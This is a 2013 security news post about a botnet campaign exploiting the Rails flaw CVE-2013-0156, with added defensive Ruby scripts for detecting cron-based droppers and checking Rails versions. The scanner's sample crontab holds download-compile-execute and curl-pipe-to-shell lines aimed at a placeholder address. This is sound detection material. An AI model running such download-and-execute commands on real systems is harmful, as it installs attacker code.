ExtremeHacking
Ruby on Rails exploit could hijack unpatched servers for botnet
Posted 5/31/2013
Server administrators are being urged to update their Ruby on Rails installations following the discovery of an active malware campaign that targets unpatched versions of the web application framework.

According to security researcher Jeff Jarmoc, attackers are exploiting a known and already patched vulnerability in Ruby on Rails (Ruby is the language; Rails is the web framework written in it). The flaw gives a remote user code execution in the application, which the attackers use to edit the web server's crontab so that a scheduled job downloads a file to the /tmp directory, compiles it there and executes it.

The exploit currently in use adds a custom cron job (a scheduled task on Linux machines) that executes a sequence of commands.

"Functionality is limited, but includes the ability to download and execute files as commanded, as well as changing servers," Jarmoc blogged. "There's no authentication performed, so an enterprising individual could hijack these bots fairly easily by joining the IRC server and issuing the appropriate commands."

The original flaw, tracked as CVE-2013-0156, is in the Ruby on Rails code that parses request parameters: the XML parameter parser honoured type annotations that made it deserialize YAML and Symbol values from untrusted input, which is what lets an unauthenticated attacker run arbitrary Ruby inside the application.

Through this flaw the attackers download a malicious C source file from a remote server, compile it locally and execute it. The resulting malware is a bot that connects to an IRC (Internet Relay Chat) server and joins a predefined channel, where it waits for commands from the attackers.
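The cron-based dropper described above has a recognisable shape: a scheduled job that fetches something, puts it under /tmp, and compiles or runs it. The following Ruby script is an added example written for this page, not code from the original article or from Jeff Jarmoc's write-up; the regexes, the "suspicious" rule and the sample crontab (with 198.51.100.7, a documentation address) are this example's own assumptions, not published indicators. It scans crontab text and flags entries that match that shape while leaving ordinary jobs that merely touch /tmp alone.

```ruby
# Added example (not from the original article or Jeff Jarmoc's write-up):
# scan crontab entries for the pattern the article describes, a scheduled job
# that fetches a file into /tmp, compiles it and executes it. Regexes, the
# flagging rule and the sample crontab below are assumptions made for this page.

# One crontab entry: five time fields (or an @keyword) followed by the command.
CRON_ENTRY_RE = /\A(?:@\w+\s+|(?:\S+\s+){5})(?<cmd>\S.*)\z/

# Indicators, each matched against the command part only.
INDICATORS = {
  fetch:         /\b(?:wget|curl|fetch|tftp)\b/,
  # a /tmp path used as an argument or redirect target
  tmp_path:      %r{(?:\A|[\s=;|&>])/tmp/},
  compile:       /\b(?:gcc|cc|tcc|clang|g\+\+|make)\b/,
  # a command that starts with, or follows a separator with, something under /tmp or ./
  exec_tmp:      %r{(?:\A|[;&|]\s*)(?:(?:sh|bash|perl|python\d?)\s+)?(?:/tmp/|\./)\S+},
  pipe_to_shell: /\b(?:wget|curl)\b[^|]*\|\s*(?:sh|bash)\b/,
}.freeze

# An entry is flagged when it fetches something AND either drops/compiles/runs
# it under /tmp or pipes it straight into a shell (assumed rule).
def suspicious?(found)
  return false unless found.include?(:fetch)
  found.include?(:pipe_to_shell) ||
    (found.include?(:tmp_path) && (found.include?(:compile) || found.include?(:exec_tmp)))
end

# Returns an array of { line:, cmd:, indicators: } for every flagged entry.
def scan_crontab(text)
  hits = []
  text.each_line.with_index(1) do |raw, lineno|
    line = raw.strip
    next if line.empty? || line.start_with?("#")
    m = CRON_ENTRY_RE.match(line)
    next unless m                       # skips env assignments such as MAILTO=root
    cmd = m[:cmd]
    found = INDICATORS.select { |_, re| cmd =~ re }.keys
    hits << { line: lineno, cmd: cmd, indicators: found } if suspicious?(found)
  end
  hits
end

# Constructed sample crontab; 198.51.100.7 is a documentation address, not a real host.
SAMPLE_CRONTAB = <<~CRON
  MAILTO=root
  # nightly certificate renewal
  0 3 * * * /usr/bin/certbot renew --quiet
  30 2 * * 0 tar czf /tmp/backup.tgz /var/www
  @reboot /usr/local/bin/start-app
  */5 * * * * wget -q -O /tmp/a.c http://198.51.100.7/a.c; gcc -o /tmp/a /tmp/a.c; /tmp/a
  */10 * * * * curl -s http://198.51.100.7/x | sh
CRON

if __FILE__ == $PROGRAM_NAME
  scan_crontab(SAMPLE_CRONTAB).each do |h|
    puts "line #{h[:line]}: #{h[:indicators].join(',')}  =>  #{h[:cmd]}"
  end
end
```

On a real host, feed it the output of `crontab -l` for each user plus the files under /etc/cron.d, and treat the backup job on line 4 as the reason the rule requires a fetch as well as a /tmp path: writing to /tmp alone is routine, fetching code into it and running it is not.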

Users should update the Ruby on Rails installations on their servers to at least version 3.2.11, 3.1.10, 3.0.19 or 2.3.15, whichever applies to the release series they run; these are the releases that contain the patch for this vulnerability. The fixes were published in January 2013, months before this campaign, so any server still below those versions is exposed.
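Checking which side of those version lines a server sits on is a quick scripted test. The Ruby below is an added example for this page, not code from the original article or from the Rails project; it takes the four fixed versions the article lists, reads the rails version out of a Gemfile.lock (assuming the standard four-space-indented "rails (x.y.z)" spec line Bundler writes), and reports whether that version is below the fix for its own series. The sample lockfile is constructed, and the handling of series with no listed fix (treating anything older than 2.3 as vulnerable and anything newer than 3.2 as cut after the fix) is this example's assumption.

```ruby
# Added example (not from the original article or the Rails project): decide
# whether a Rails version is below the patched release of its own series,
# using the fixed versions the article lists. Lockfile parsing assumes the
# standard "    rails (x.y.z)" spec line; the sample lockfile is constructed.
require "rubygems"   # Gem::Version; already loaded on modern Ruby, kept for clarity

# First fixed release in each series, as listed in the article for CVE-2013-0156.
FIXED_VERSIONS = %w[3.2.11 3.1.10 3.0.19 2.3.15].map { |v| Gem::Version.new(v) }.freeze

# Returns :vulnerable or :patched for a version string such as "3.2.10".
def cve_2013_0156_status(version)
  v = Gem::Version.new(version)
  fix = FIXED_VERSIONS.find { |f| f.segments[0, 2] == v.segments[0, 2] }
  if fix
    v < fix ? :vulnerable : :patched
  elsif v < FIXED_VERSIONS.min
    :vulnerable   # assumption: series older than 2.3 never received this fix
  else
    :patched      # assumption: 4.x and later were cut after the January 2013 fix
  end
end

# Pulls the resolved rails version out of Gemfile.lock text, or nil if absent.
def rails_version_from_lockfile(text)
  m = text.match(/^ {4}rails \((\d[^)]*)\)/)
  m && m[1]
end

# Constructed sample lockfile for an application still on Rails 3.2.10.
SAMPLE_GEMFILE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      actionpack (3.2.10)
        activemodel (= 3.2.10)
      rails (3.2.10)
        actionpack (= 3.2.10)
        railties (= 3.2.10)

  DEPENDENCIES
    rails (= 3.2.10)
LOCK

if __FILE__ == $PROGRAM_NAME
  ver = rails_version_from_lockfile(SAMPLE_GEMFILE_LOCK)
  puts "rails #{ver}: #{cve_2013_0156_status(ver)}"
end
```

Run it against each application's real Gemfile.lock (or against the output of `rails -v` on the server) rather than trusting the version in a deployment document; the lockfile records what is actually installed.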

Cyber Suraksha Abhiyan | Sadik Shaikh © 2015 Sadik Shaikh | CEH V9 | ETHICAL HACKING Course Training Institute in India-Pune